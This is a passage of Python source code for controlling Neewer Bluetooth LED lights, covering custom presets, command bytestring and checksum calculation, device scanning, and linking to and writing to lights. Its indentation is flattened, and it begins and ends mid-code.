pass # could not load the GUI, but we have already logged an error message
# WORKING WITH CUSTOM PRESETS
def customPresetInfoBuilder(numOfPreset, formatForHTTP = False):
toolTipBuilder = [] # constructor for the tooltip
numOfLights = len(customLightPresets[numOfPreset]) # the number of lights in this specific preset
if numOfLights == 1 and customLightPresets[numOfPreset][0][0] == -1: # we're looking at a global preset
if formatForHTTP == False:
toolTipBuilder.append("[GLOBAL PRESET]")
else:
toolTipBuilder.append("<STRONG>[GLOBAL PRESET]</STRONG>")
else: # we're looking at a snapshot preset
if formatForHTTP == False:
toolTipBuilder.append("[SNAPSHOT PRESET]")
else:
toolTipBuilder.append("<STRONG>[SNAPSHOT PRESET]</STRONG>")
toolTipBuilder.append("")
for a in range(numOfLights): # write out a little description of each part of this preset
if customLightPresets[numOfPreset][a][0] == -1:
if formatForHTTP == False:
toolTipBuilder.append(" FOR: ALL SELECTED LIGHTS") # this is a global preset, and it affects all *selected* lights
else:
toolTipBuilder.append(" FOR: ALL LIGHTS AVAILABLE") # this is a global preset, and it affects all lights
else:
currentLight = returnLightIndexesFromMacAddress(customLightPresets[numOfPreset][a][0]) # find the light in the current list
if currentLight != []: # if we have a match, add it to the list of lights to highlight
if availableLights[currentLight[0]][2] != "": # if the custom name is filled in
toolTipBuilder.append(" FOR: " + availableLights[currentLight[0]][2] + " [" + availableLights[currentLight[0]][0].name + "]")
else:
toolTipBuilder.append(" FOR: " + availableLights[currentLight[0]][0].name)
else:
toolTipBuilder.append("FOR: ---LIGHT NOT AVAILABLE AT THE MOMENT---") # if the light is not found (yet), display that
toolTipBuilder.append(" " + customLightPresets[numOfPreset][a][0] + "") # this is a snapshot preset, and this specific preset controls this light
if customLightPresets[numOfPreset][a][1][0] == 5:
if formatForHTTP == False:
toolTipBuilder.append(" > MODE: CCT / TEMP: " + str(customLightPresets[numOfPreset][a][1][2]) + "00K / BRIGHTNESS: " + str(customLightPresets[numOfPreset][a][1][1]) + "% < ")
else:
toolTipBuilder.append(" > MODE: CCT / TEMP: " + str(customLightPresets[numOfPreset][a][1][2]) + "00K / BRIGHTNESS: " + str(customLightPresets[numOfPreset][a][1][1]) + "% < ")
elif customLightPresets[numOfPreset][a][1][0] == 4:
if formatForHTTP == False:
toolTipBuilder.append(" > MODE: HSI / H: " + str(customLightPresets[numOfPreset][a][1][2]) + "º / S: " + str(customLightPresets[numOfPreset][a][1][3]) + "% / I: " + str(customLightPresets[numOfPreset][a][1][1]) + "% < ")
else: # if we're sending this string back for the HTTP server, then replace the degree with the HTML version
toolTipBuilder.append(" > MODE: HSI / H: " + str(customLightPresets[numOfPreset][a][1][2]) + "° / S: " + str(customLightPresets[numOfPreset][a][1][3]) + "% / I: " + str(customLightPresets[numOfPreset][a][1][1]) + "% < ")
elif customLightPresets[numOfPreset][a][1][0] == 6:
if formatForHTTP == False:
toolTipBuilder.append(" > MODE: SCENE / ANIMATION: " + str(customLightPresets[numOfPreset][a][1][2]) + " / BRIGHTNESS: " + str(customLightPresets[numOfPreset][a][1][1]) + "% < ")
else:
toolTipBuilder.append(" > MODE: SCENE / ANIMATION: " + str(customLightPresets[numOfPreset][a][1][2]) + " / BRIGHTNESS: " + str(customLightPresets[numOfPreset][a][1][1]) + "% < ")
else: # if we're set to turn the light off, show that here
if formatForHTTP == False:
toolTipBuilder.append(" > TURN THIS LIGHT OFF < ")
else:
toolTipBuilder.append(" > TURN THIS LIGHT OFF < ")
if numOfLights > 1 and a < (numOfLights - 1): # if we have any more lights, then separate each one
if formatForHTTP == False:
toolTipBuilder.append("----------------------------")
else:
toolTipBuilder.append("")
if formatForHTTP == False:
return "\n".join(toolTipBuilder)
else:
return "<BR>".join(toolTipBuilder)
def recallCustomPreset(numOfPreset, updateGUI=True, loop=None):
global availableLights
global lastSelection
changedLights = [] # if a snapshot preset exists in this setting, log the lights that are to be changed here
for a in range(len(customLightPresets[numOfPreset])): # check all the entries stored in this preset
if customLightPresets[numOfPreset][0][0] == -1: # we're looking at a global preset, so set the light(s) up accordingly
if updateGUI == True: # if we are in the GUI
if mainWindow.selectedLights() == []: # and no lights are selected in the light selector
mainWindow.lightTable.selectAll() # select all of the lights available
time.sleep(0.2)
if customLightPresets[numOfPreset][0][1][0] == 5: # the preset is in CCT mode
p_colorMode = "CCT"
p_brightness = customLightPresets[numOfPreset][0][1][1]
p_temp = customLightPresets[numOfPreset][0][1][2]
if updateGUI == True:
mainWindow.setUpGUI(colorMode=p_colorMode, brightness=p_brightness, temp=p_temp)
else:
computedValue = calculateByteString(True, colorMode=p_colorMode, brightness=p_brightness, temp=p_temp)
elif customLightPresets[numOfPreset][0][1][0] == 4: # the preset is in HSI mode
p_colorMode = "HSI"
# Due to the way the custom presets store information (brightness is always first),
# this section is broken up into H, S and I portions for readability
p_hue = customLightPresets[numOfPreset][0][1][2]
p_sat = customLightPresets[numOfPreset][0][1][3]
p_int = customLightPresets[numOfPreset][0][1][1]
if updateGUI == True:
mainWindow.setUpGUI(colorMode=p_colorMode, hue=p_hue, sat=p_sat, brightness=p_int)
else:
computedValue = calculateByteString(True, colorMode=p_colorMode, HSI_H=p_hue, HSI_S=p_sat, HSI_I=p_int)
elif customLightPresets[numOfPreset][0][1][0] == 6: # the preset is in ANM/SCENE mode
p_colorMode = "ANM"
p_brightness = customLightPresets[numOfPreset][0][1][1]
p_scene = customLightPresets[numOfPreset][0][1][2]
if updateGUI == True:
mainWindow.setUpGUI(colorMode=p_colorMode, brightness=p_brightness, scene=p_scene)
else:
computedValue = calculateByteString(True, colorMode=p_colorMode, brightness=p_brightness, scene=p_scene)
if updateGUI == False:
for b in range(len(availableLights)):
changedLights.append(b) # add each light to changedLights
availableLights[b][3] = computedValue # set each light's "last" parameter to the computed value above
else: # we're looking at a snapshot preset, so see if any of those lights are available to change
currentLight = returnLightIndexesFromMacAddress(customLightPresets[numOfPreset][a][0])
if currentLight != []: # if we have a match
# always refer to the light it found as currentLight[0]
if customLightPresets[numOfPreset][a][1][0] == 5 or customLightPresets[numOfPreset][a][1][0] == 8: # the preset is in CCT mode
availableLights[currentLight[0]][3] = calculateByteString(True, colorMode="CCT",\
brightness=customLightPresets[numOfPreset][a][1][1],\
temp=customLightPresets[numOfPreset][a][1][2])
if customLightPresets[numOfPreset][a][1][0] == 8: # if we want to turn the light off, let the send system know this
availableLights[currentLight[0]][3][0] = 0
elif customLightPresets[numOfPreset][a][1][0] == 4 or customLightPresets[numOfPreset][a][1][0] == 7: # the preset is in HSI mode
availableLights[currentLight[0]][3] = calculateByteString(True, colorMode="HSI",\
HSI_I=customLightPresets[numOfPreset][a][1][1],\
HSI_H=customLightPresets[numOfPreset][a][1][2],\
HSI_S=customLightPresets[numOfPreset][a][1][3])
if customLightPresets[numOfPreset][a][1][0] == 7: # if we want to turn the light off, let the send system know this
availableLights[currentLight[0]][3][0] = 0
elif customLightPresets[numOfPreset][a][1][0] == 6 or customLightPresets[numOfPreset][a][1][0] == 9: # the preset is in ANM/SCENE mode
availableLights[currentLight[0]][3] = calculateByteString(True, colorMode="ANM",\
brightness=customLightPresets[numOfPreset][a][1][1],\
animation=customLightPresets[numOfPreset][a][1][2])
if customLightPresets[numOfPreset][a][1][0] == 9: # if we want to turn the light off, let the send system know this
availableLights[currentLight[0]][3][0] = 0
changedLights.append(currentLight[0])
if changedLights != []:
if updateGUI == True:
lastSelection = [] # clear the last selection if you've clicked on a snapshot preset (which, if we're here, you did)
mainWindow.lightTable.setFocus() # set the focus to the light table, in order to show which rows are selected
mainWindow.selectRows(changedLights) # select those rows affected by the lights above
global threadAction
threadAction = "send|" + "|".join(map(str, changedLights)) # set the thread to write to all of the affected lights
else:
processMultipleSends(loop, "send|" + "|".join(map(str, changedLights)), updateGUI)
def saveCustomPreset(presetType, numOfPreset, selectedLights = []):
global customLightPresets
if presetType == "global":
customLightPresets[numOfPreset] = [listBuilder(-1)]
elif presetType == "snapshot":
listConstructor = []
if selectedLights == []: # add all the lights to the snapshot preset
for a in range(len(availableLights)):
listConstructor.append(listBuilder(a))
else: # add only the selected lights to the snapshot preset
for a in range(len(selectedLights)):
listConstructor.append(listBuilder(selectedLights[a]))
customLightPresets[numOfPreset] = listConstructor
def listBuilder(selectedLight):
paramsListBuilder = [] # the cut-down list of parameters to return to the main preset constructor
if selectedLight == -1: # then we get the value from sendValue
lightMACAddress = -1 # this is a global preset
listToWorkWith = sendValue # we're using the last sent parameter on any light for this
else: # we're recalling the params for a specific light
lightMACAddress = availableLights[selectedLight][0].address # this is a snapshot preset
listToWorkWith = availableLights[selectedLight][3] # we're specificially using the last parameter for the specified light for this
if listToWorkWith != []: # if we have elements in this list, then sort them out
if availableLights[selectedLight][6] == False:
paramsListBuilder.append(listToWorkWith[1] - 127) # the first value is the mode, but -127 to simplify it (and mark it as being OFF)
else:
paramsListBuilder.append(listToWorkWith[1] - 130) # the first value is the mode, but -130 to simplify it (and mark it as being ON)
if listToWorkWith[1] == 135: # we're in CCT mode
paramsListBuilder.append(listToWorkWith[3]) # the brightness
paramsListBuilder.append(listToWorkWith[4]) # the color temperature
elif listToWorkWith[1] == 134: # we're in HSI mode
paramsListBuilder.append(listToWorkWith[6]) # the brightness
paramsListBuilder.append(listToWorkWith[3] + (256 * listToWorkWith[4])) # the hue
paramsListBuilder.append(listToWorkWith[5]) # the saturation
elif listToWorkWith[1] == 136: # we're in ANM/SCENE
paramsListBuilder.append(listToWorkWith[3]) # the brightness
paramsListBuilder.append(listToWorkWith[4]) # the scene
return [lightMACAddress, paramsListBuilder]
def customPresetToString(numOfPreset):
returnedString = "customPreset" + str(numOfPreset) + "=" # the string to return back to the saving mechanism
numOfLights = len(customLightPresets[numOfPreset]) # how many lights this custom preset holds values for
for a in range(numOfLights): # get all of the lights stored in this preset (or 1 if it's a global)
returnedString += str(customLightPresets[numOfPreset][a][0]) # get the MAC address/UUID of the nth light
returnedString += "|" + "|".join(map(str,customLightPresets[numOfPreset][a][1])) # get a string for the rest of this current array
if numOfLights > 1 and a < (numOfLights - 1): # if there are more lights left, then add a semicolon to differentiate that
returnedString += ";"
return returnedString
def stringToCustomPreset(presetString, numOfPreset):
if presetString != "|": # if the string is a valid string, then process it
lightsToWorkWith = presetString.split(";") # split the current string into individual lights
presetToReturn = [] # a list containing all of the preset information
for a in range(len(lightsToWorkWith)):
presetList = lightsToWorkWith[a].split("|") # split the current light list into its individual items
presetPayload = [] # the actual preset list
for b in range(1, len(presetList)):
presetPayload.append(int(presetList[b]))
if presetList[0] == "-1":
presetToReturn.append([-1, presetPayload]) # if the light ID is -1, keep that value as an integer
else:
presetToReturn.append([presetList[0], presetPayload]) # if it isn't, then the MAC address is a string, so keep it that way
return presetToReturn
else: # if it isn't, then just return the default parameters for this preset
return defaultLightPresets[numOfPreset]
def loadCustomPresets():
global customLightPresets
# READ THE PREFERENCES FILE INTO A LIST
fileToOpen = open(customLightPresetsFile)
customPresets = fileToOpen.read().split("\n")
fileToOpen.close()
acceptable_arguments = ["customPreset0", "customPreset1", "customPreset2", "customPreset3", \
"customPreset4", "customPreset5", "customPreset6", "customPreset7"]
for a in range(len(customPresets) - 1, -1, -1):
if not any(x in customPresets[a] for x in acceptable_arguments): # if the current argument is invalid
customPresets.pop(a) # delete the invalid argument from the list
# NOW THAT ANY STRAGGLERS ARE OUT, ADD DASHES TO WHAT REMAINS TO PROPERLY PARSE IN THE PARSER
for a in range(len(customPresets)):
customPresets[a] = "--" + customPresets[a]
customPresetParser = argparse.ArgumentParser()
customPresetParser.add_argument("--customPreset0", default=-1)
customPresetParser.add_argument("--customPreset1", default=-1)
customPresetParser.add_argument("--customPreset2", default=-1)
customPresetParser.add_argument("--customPreset3", default=-1)
customPresetParser.add_argument("--customPreset4", default=-1)
customPresetParser.add_argument("--customPreset5", default=-1)
customPresetParser.add_argument("--customPreset6", default=-1)
customPresetParser.add_argument("--customPreset7", default=-1)
customPresets = customPresetParser.parse_args(customPresets)
if customPresets.customPreset0 != -1:
customLightPresets[0] = stringToCustomPreset(customPresets.customPreset0, 0)
if customPresets.customPreset1 != -1:
customLightPresets[1] = stringToCustomPreset(customPresets.customPreset1, 1)
if customPresets.customPreset2 != -1:
customLightPresets[2] = stringToCustomPreset(customPresets.customPreset2, 2)
if customPresets.customPreset3 != -1:
customLightPresets[3] = stringToCustomPreset(customPresets.customPreset3, 3)
if customPresets.customPreset4 != -1:
customLightPresets[4] = stringToCustomPreset(customPresets.customPreset4, 4)
if customPresets.customPreset5 != -1:
customLightPresets[5] = stringToCustomPreset(customPresets.customPreset5, 5)
if customPresets.customPreset6 != -1:
customLightPresets[6] = stringToCustomPreset(customPresets.customPreset6, 6)
if customPresets.customPreset7 != -1:
customLightPresets[7] = stringToCustomPreset(customPresets.customPreset7, 7)
# RETURN THE CORRECT NAME FOR THE IDENTIFIER OF THE LIGHT (FOR DEBUG STRINGS)
def returnMACname():
if platform.system() == "Darwin":
return "UUID:"
else:
return "MAC Address:"
# TEST TO MAKE SURE THE VALUE GIVEN TO THE FUNCTION IS VALID OR IN BOUNDS
def testValid(theParam, theValue, defaultValue, startBounds, endBounds):
if theParam == "temp":
if len(theValue) > 1: # if the temp has at least 2 characters in it
theValue = theValue[:2] # take the first 2 characters of the string to convert into int
else: # it either doesn't have enough characters, or isn't a number
printDebugString(" >> error with --temp specified (not enough digits or not a number), so falling back to default value of " + str(defaultValue))
theValue = defaultValue # default to 56(00)K for color temperature
try: # try converting the string into an integer and processing the bounds
theValue = int(theValue) # the value is assumed to be within the bounds, so we check it...
if theValue < startBounds or theValue > endBounds: # the value is not within bounds, so there's an error
if theValue < startBounds: # if the value specified is below the starting boundary, make it the starting boundary
printDebugString(" >> --" + theParam + " (" + str(theValue) + ") isn't between the bounds of " + str(startBounds) + " and " + str(endBounds) + ", so falling back to closest boundary of " + str(startBounds))
theValue = startBounds
elif theValue > endBounds: # if the value specified is above the ending boundary, make it the ending boundary
printDebugString(" >> --" + theParam + " (" + str(theValue) + ") isn't between the bounds of " + str(startBounds) + " and " + str(endBounds) + ", so falling back to closest boundary of " + str(endBounds))
theValue = endBounds
return theValue # return the within-bounds value
except ValueError: # if the string can not be converted, then return the defaultValue
printDebugString(" >> --" + theParam + " specified is not a number - falling back to default value of " + str(defaultValue))
return defaultValue # return the default value
# PRINT A DEBUG STRING TO THE CONSOLE, ALONG WITH THE CURRENT TIME
def printDebugString(theString):
if printDebug == True:
now = datetime.now()
currentTime = now.strftime("%H:%M:%S")
print("[" + currentTime + "] - " + theString)
# CALCULATE THE BYTESTRING TO SEND TO THE LIGHT
def calculateByteString(returnValue = False, **modeArgs):
if modeArgs["colorMode"] == "CCT":
# We're in CCT (color balance) mode
computedValue = [120, 135, 2, 0, 0, 0]
computedValue[3] = int(modeArgs["brightness"]) # the brightness value
computedValue[4] = int(modeArgs["temp"]) # the color temp value, ranging from 32(00K) to 85(00)K - some lights (like the SL-80) can go as high as 8500K
computedValue[5] = calculateChecksum(computedValue) # compute the checksum
elif modeArgs["colorMode"] == "HSI":
# We're in HSI (any color of the spectrum) mode
computedValue = [120, 134, 4, 0, 0, 0, 0, 0]
computedValue[3] = int(modeArgs["HSI_H"]) & 255 # hue value, up to 255
computedValue[4] = (int(modeArgs["HSI_H"]) & 65280) >> 8 # offset value, computed from above value
computedValue[5] = int(modeArgs["HSI_S"]) # saturation value
computedValue[6] = int(modeArgs["HSI_I"]) # intensity value
computedValue[7] = calculateChecksum(computedValue) # compute the checksum
elif modeArgs["colorMode"] == "ANM":
# We're in ANM (animation) mode
computedValue = [120, 136, 2, 0, 0, 0]
computedValue[3] = int(modeArgs["brightness"]) # brightness value
computedValue[4] = int(modeArgs["animation"]) # the number of animation you're going to run (check comments above)
computedValue[5] = calculateChecksum(computedValue) # compute the checksum
else:
computedValue = [0]
if returnValue == False: # if we aren't supposed to return a value, then just set sendValue to the value returned from computedValue
global sendValue
sendValue = computedValue
else:
return computedValue # return the computed value
# RECALCULATE THE BYTESTRING FOR CCT-ONLY NEEWER LIGHTS INTO HUE AND BRIGHTNESS SEPARATELY
def calculateSeparateBytestrings(sendValue):
# CALCULATE BRIGHTNESS ONLY PARAMETER FROM MAIN PARAMETER
newValueBRI = [120, 130, 1, sendValue[3], 0]
newValueBRI[4] = calculateChecksum(newValueBRI)
# CALCULATE HUE ONLY PARAMETER FROM MAIN PARAMETER
newValueHUE = [120, 131, 1, sendValue[4], 0]
newValueHUE[4] = calculateChecksum(newValueHUE)
if CCTSlider == -1: # return both newly computed values
return [newValueBRI, newValueHUE]
elif CCTSlider == 1: # return only the brightness value
return newValueBRI
elif CCTSlider == 2: # return only the hue value
return newValueHUE
def setPowerBytestring(onOrOff):
global sendValue
if onOrOff == "ON":
sendValue = [120, 129, 1, 1, 251] # return the "turn on" bytestring
else:
sendValue = [120, 129, 1, 2, 252] # return the "turn off" bytestring
# MAKE CURRENT BYTESTRING INTO A STRING OF HEX CHARACTERS TO SHOW THE CURRENT VALUE BEING GENERATED BY THE PROGRAM
def updateStatus(splitString = False, customValue=False):
currentHexString = ""
if customValue == False:
customValue = sendValue
if splitString == False: # False is for the status bar (shows the bytestring computed as one long line)
for a in range(len(customValue)):
currentHexString = currentHexString + " " + str(hex(customValue[a]))
else: # True is for the table view, this view no longer shows bytestring, but readable status of current mode (temp/bri/hue, etc.)
currentHexString = ""
if customValue[1] == 134:
currentHexString = "(HSI MODE):\n"
currentHexString = currentHexString + " H: " + str(customValue[3] + (256 * customValue[4])) + u'\N{DEGREE SIGN}' + " / S: " + str(customValue[5]) + " / I: " + str(customValue[6])
elif customValue[1] == 135:
currentHexString = "(CCT MODE):\n"
currentHexString = currentHexString + " TEMP: " + str(customValue[4]) + "00K / BRI: " + str(customValue[3])
elif customValue[1] == 136:
currentHexString = "(ANM/SCENE MODE):\n"
currentHexString = currentHexString + " SCENE: " + str(customValue[4]) + " / BRI: " + str(customValue[3])
return currentHexString
# CALCULATE THE CHECKSUM FROM THE BYTESTRING
def calculateChecksum(sendValue):
checkSum = 0
for a in range(len(sendValue) - 1):
if sendValue[a] < 0:
checkSum = checkSum + int(sendValue[a] + 256)
else:
checkSum = checkSum + int(sendValue[a])
checkSum = checkSum & 255
return checkSum
# FIND NEW LIGHTS
async def findDevices():
global availableLights
printDebugString("Searching for new lights")
currentScan = [] # add all the current scan's lights detected to a standby array (to check against the main one)
devices = await BleakScanner.discover() # scan all available Bluetooth devices nearby
for d in devices: # go through all of the devices Bleak just found
if d.address in whiteListedMACs: # if the MAC address is in the list of whitelisted addresses, add this device
printDebugString("Matching whitelisted address found - " + returnMACname() + " " + d.address + ", adding to the list")
currentScan.append(d)
else: # if this device is not whitelisted, check to see if it's valid (contains "NEEWER" in the name)
if d.name != None and "NEEWER" in d.name: # if Bleak returned a proper string, and the string has "NEEWER" in the name
currentScan.append(d) # add this light to this session's available lights
for a in range(len(currentScan)): # scan the newly found NEEWER devices
newLight = True # initially mark this light as a "new light"
# check the "new light" against the global list
for b in range(len(availableLights)):
if currentScan[a].address == availableLights[b][0].address: # if the new light's MAC address matches one already in the global list
printDebugString("Light found! [" + currentScan[a].name + "] " + returnMACname() + " " + currentScan[a].address + " but it's already in the list. It may have disconnected, so relinking might be necessary.")
newLight = False # then don't add another instance of it
# if we found the light *again*, it's most likely the light disconnected, so we need to link it again
availableLights[b][0].rssi = currentScan[a].rssi # update the RSSI information
availableLights[b][1] = "" # clear the Bleak connection (as it's changed) to force the light to need re-linking
break # stop checking if we've found a negative result
if newLight == True: # if this light was not found in the global list, then we need to add it
printDebugString("Found new light! [" + currentScan[a].name + "] " + returnMACname() + " " + currentScan[a].address + " RSSI: " + str(currentScan[a].rssi) + " dBm")
customPrefs = getCustomLightPrefs(currentScan[a].address, currentScan[a].name)
if len(customPrefs) == 3: # we need to rename the light and set up CCT and color temp range
availableLights.append([currentScan[a], "", customPrefs[0], [120, 135, 2, 20, 56, 157], customPrefs[1], customPrefs[2], True, ["---", "---"]]) # add it to the global list
elif len(customPrefs) == 4: # same as above, but we have previously stored parameters, so add them in as well
availableLights.append([currentScan[a], "", customPrefs[0], customPrefs[3], customPrefs[1], customPrefs[2], True, ["---", "---"]]) # add it to the global list
if threadAction != "quit":
return "" # once the device scan is over, set the threadAction to nothing
else: # if we're requesting that we quit, then just quit
return "quit"
def getCustomLightPrefs(MACAddress, lightName = ""):
customPrefsPath = MACAddress.split(":")
customPrefsPath = os.path.dirname(os.path.abspath(sys.argv[0])) + os.sep + "light_prefs" + os.sep + "".join(customPrefsPath)
if os.path.exists(customPrefsPath):
printDebugString("A custom preferences file was found for " + MACAddress + "!")
# READ THE PREFERENCES FILE INTO A LIST
fileToOpen = open(customPrefsPath)
customPrefs = fileToOpen.read().split("|")
fileToOpen.close()
# CHANGE STRING "Booleans" INTO ACTUAL BOOLEANS
for b in range(1,3):
if customPrefs[b] == "True":
customPrefs[b] = True
else:
customPrefs[b] = False
if len(customPrefs) == 4: # if we have a 4th element (the last used parameters), then load them here
customPrefs[3] = customPrefs[3].replace(" ", "").split(",") # split the last params into a list
for a in range(len(customPrefs[3])): # convert the string values to ints
customPrefs[3][a] = int(customPrefs[3][a])
else: # if there is no custom preferences file, still check the name against a list of per-light parameters
if lightName == "NEEWER-SL80": # we can use extended ranges with the SL80
customPrefs = ["", True, False]
elif lightName == "NEEWER-SNL660": # we can ONLY use CCT mode with the SNL-660
customPrefs = ["", False, True]
else: # return a blank slate
customPrefs = ["", False, False]
return customPrefs
# CONNECT (LINK) TO A LIGHT
async def connectToLight(selectedLight, updateGUI=True):
global availableLights
isConnected = False # whether or not the light is connected
returnValue = "" # the value to return to the thread (in GUI mode, a string) or True/False (in CLI mode, a boolean value)
lightName = availableLights[selectedLight][0].name # the Name of the light (for status updates)
lightMAC = availableLights[selectedLight][0].address # the MAC address of the light (to keep track of the light even if the index number changes)
# FILL THE [1] ELEMENT OF THE availableLights ARRAY WITH THE BLEAK CONNECTION
if availableLights[returnLightIndexesFromMacAddress(lightMAC)[0]][1] == "":
availableLights[returnLightIndexesFromMacAddress(lightMAC)[0]][1] = BleakClient(availableLights[returnLightIndexesFromMacAddress(lightMAC)[0]][0])
await asyncio.sleep(0.25) # wait just a short time before trying to connect
# TRY TO CONNECT TO THE LIGHT SEVERAL TIMES BEFORE GIVING UP THE LINK
currentAttempt = 1
while isConnected == False and currentAttempt <= maxNumOfAttempts:
if threadAction != "quit":
try:
if not availableLights[returnLightIndexesFromMacAddress(lightMAC)[0]][1].is_connected: # if the current device isn't linked to Bluetooth
printDebugString("Attempting to link to light [" + lightName + "] " + returnMACname() + " " + lightMAC + " (Attempt " + str(currentAttempt) + " of " + str(maxNumOfAttempts) + ")")
isConnected = await availableLights[returnLightIndexesFromMacAddress(lightMAC)[0]][1].connect() # try connecting it (and return the connection status)
else:
isConnected = True # the light is already connected, so mark it as being connected
except Exception as e:
printDebugString("Error linking to light [" + lightName + "] " + returnMACname() + " " + lightMAC)
if updateGUI == True:
if currentAttempt < maxNumOfAttempts:
mainWindow.setTheTable(["", "", "NOT\nLINKED", "There was an error connecting to the light, trying again (Attempt " + str(currentAttempt + 1) + " of " + str(maxNumOfAttempts) + ")..."], returnLightIndexesFromMacAddress(lightMAC)[0]) # there was an issue connecting this specific light to Bluetooth, so show that
else:
returnValue = False # if we're in CLI mode, and there is an error connecting to the light, return False
currentAttempt = currentAttempt + 1
await asyncio.sleep(4) # wait a few seconds before trying to link to the light again
else:
return "quit"
if threadAction == "quit":
return "quit"
else:
if isConnected == True:
printDebugString("Successful link on light [" + lightName + "] " + returnMACname() + " " + lightMAC)
if updateGUI == True:
mainWindow.setTheTable(["", "", "LINKED", "Waiting to send..."], returnLightIndexesFromMacAddress(lightMAC)[0]) # if it's successful, show that in the table
else:
returnValue = True # if we're in CLI mode, and there is no error connecting to the light, return True
else:
if updateGUI == True:
mainWindow.setTheTable(["", "", "NOT\nLINKED", "There was an error connecting to the light"], returnLightIndexesFromMacAddress(lightMAC)[0]) # there was an issue connecting this specific light to Bluetooh, so show that
returnValue = False # the light is not connected
return returnValue # once the connection is over, then return either True or False (for CLI) or nothing (for GUI)
async def readNotifyCharacteristic(selectedLight, diagCommand, typeOfData):
# clear the global variable before asking the light for info
global receivedData
receivedData = ""
try:
await availableLights[selectedLight][1].start_notify(notifyLightUUID, notifyCallback) # start reading notifications from the light
except Exception as e:
try: # if we've resorted the list, there is a possibility of a hanging callback, so this will raise an exception
await availableLights[selectedLight][1].stop_notify(notifyLightUUID) # so we need to try disconnecting first
await asyncio.sleep(0.5) # wait a little bit of time before re-connecting to the callback
await availableLights[selectedLight][1].start_notify(notifyLightUUID, notifyCallback) # try again to start reading notifications from the light
except Exception as e: # if we truly can't connect to the callback, return a blank string
return "" # if there is an error starting the characteristic scan, just quit out of this routine
for a in range(maxNumOfAttempts): # attempt maxNumOfAttempts times to read the characteristics
try:
await availableLights[selectedLight][1].write_gatt_char(setLightUUID, bytearray(diagCommand))
except Exception as e:
return "" # if there is an error checking the characteristic, just quit out of this routine
if receivedData != "": # if the recieved data is populated
if len(receivedData) > 1: # if we have enough elements to get a status from
if receivedData[1] == typeOfData: # if the data returned is the correct *kind* of data
break # stop scanning for data
else: # if we have a list, but it doesn't have a payload in it (the light didn't supply enough data)
receivedData = "---" # then just re-set recievedData to the default string
break # stop scanning for data
else:
await asyncio.sleep(0.25) # wait a little bit of time before checking again
try:
await availableLights[selectedLight][1].stop_notify(notifyLightUUID) # stop reading notifications from the light
except Exception as e:
pass # we will return whatever data remains from the scan, so if we can't stop the scan (light disconnected), just return what we have
return receivedData
async def getLightChannelandPower(selectedLight):
global availableLights
returnInfo = ["---", "---"] # the information to return to the light
powerInfo = await readNotifyCharacteristic(selectedLight, [120, 133, 0, 253], 2)
try:
if powerInfo != "":
if powerInfo[3] == 1:
returnInfo[0] = "ON"
elif powerInfo[3] == 2:
returnInfo[0] = "STBY"
# IF THE LIGHT IS ON, THEN ATTEMPT TO READ THE CURRENT CHANNEL
chanInfo = await readNotifyCharacteristic(selectedLight, [120, 132, 0, 252], 1)
if chanInfo != "": # if we got a result from the query
try:
returnInfo[1] = chanInfo[3] # set the current channel to the returned result
except IndexError:
pass # if we have an index error (the above value doesn't exist), then just return -1
except IndexError:
# if we have an IndexError (the information returned isn't blank, but also isn't enough to descipher the status)
# then just error out, but print the information that *was* returned for debugging purposes
printDebugString("We don't have enough information from light [" + availableLights[selectedLight][0].name + "] to get the status.")
print(powerInfo)
availableLights[selectedLight][7][0] = returnInfo[0]
if availableLights[selectedLight][1] != "---" and returnInfo[1] != "---":
availableLights[selectedLight][7][1] = returnInfo[1]
def notifyCallback(sender, data):
global receivedData
receivedData = data
# DISCONNECT FROM A LIGHT
async def disconnectFromLight(selectedLight, updateGUI=True):
returnValue = "" # same as above, string for GUI mode and boolean for CLI mode, default to blank string
if availableLights[selectedLight][1] != "": # if there is a Bleak object attached to the light, try to disconnect
try:
if availableLights[selectedLight][1].is_connected: # if the current light is connected
await availableLights[selectedLight][1].disconnect() # disconnect the selected light
except Exception as e:
returnValue = False # if we're in CLI mode, then return False if there is an error disconnecting
printDebugString("Error unlinking from light " + str(selectedLight + 1) + " [" + availableLights[selectedLight][0].name + "] " + returnMACname() + " " + availableLights[selectedLight][0].address)
print(e)
try:
if not availableLights[selectedLight][1].is_connected: # if the current light is NOT connected, then we're good
if updateGUI == True: # if we're using the GUI, update the display (if we're waiting)
mainWindow.setTheTable(["", "", "NOT\nLINKED", "Light disconnected!"], selectedLight) # show the new status in the table
else: # if we're not, then indicate that we're good
returnValue = True # if we're in CLI mode, then return False if there is an error disconnecting
printDebugString("Successfully unlinked from light " + str(selectedLight + 1) + " [" + availableLights[selectedLight][0].name + "] " + returnMACname() + " " + availableLights[selectedLight][0].address)
except AttributeError:
printDebugString("Light " + str(selectedLight + 1) + " has no Bleak object attached to it, so not attempting to disconnect from it")
return returnValue
# WRITE TO A LIGHT - optional arguments for the CLI version (GUI version doesn't use either of these)
async def writeToLight(selectedLights=0, updateGUI=True, useGlobalValue=True):
global availableLights
returnValue = "" # same as above, return value "" for GUI, or boolean for CLI
startTimer = time.time() # the start of the triggering
printDebugString("Going into send mode")
try:
if updateGUI == True:
if selectedLights == 0:
selectedLights = mainWindow.selectedLights() # get the list of currently selected lights from the GUI table
else:
if type(selectedLights) is int: # if we specify an integer-based index
selectedLights = [selectedLights] # convert asked-for light to list
currentSendValue = [] # initialize the value check
# if there are lights selected (otherwise just dump out), and the delay timer is less than it's maximum, then try to send to the lights selected
while (len(selectedLights) > 0 and time.time() - startTimer < 0.4) :
if currentSendValue != sendValue: # if the current value is different than what was last sent to the light, then send a new one
currentSendValue = sendValue # get this value before sending to multiple lights, to ensure the same value is sent to each one
for a in range(len(selectedLights)): # try to write each light in turn, and show the current data being sent to them in the table
# THIS SECTION IS FOR LOADING SNAPSHOT PRESET POWER STATES
if useGlobalValue == False: # if we're forcing the lights to use their stored parameters, then load that in here
if availableLights[selectedLights[a]][3][0] == 0: # we want to turn the light off
availableLights[selectedLights[a]][3][0] = 120 # reset the light's value to the normal value
currentSendValue = [120, 129, 1, 2, 252] # set the send value to turn the light off downstream
else: # we want to turn the light on and run a snapshot preset
await availableLights[int(selectedLights[a])][1].write_gatt_char(setLightUUID, bytearray([120, 129, 1, 1, 251]), False) # force this light to turn on
availableLights[int(selectedLights[a])][6] = True # set the ON flag of this light to True
await asyncio.sleep(0.05)
currentSendValue = availableLights[selectedLights[a]][3] # set the send value to set the preset downstream
if availableLights[selectedLights[a]][1] != "": # if a Bleak connection is there
try:
if availableLights[(int(selectedLights[a]))][5] == True: # if we're using the old style of light
if currentSendValue[1] == 135: # if we're on CCT mode
if CCTSlider == -1: # and we need to write both HUE and BRI to the light
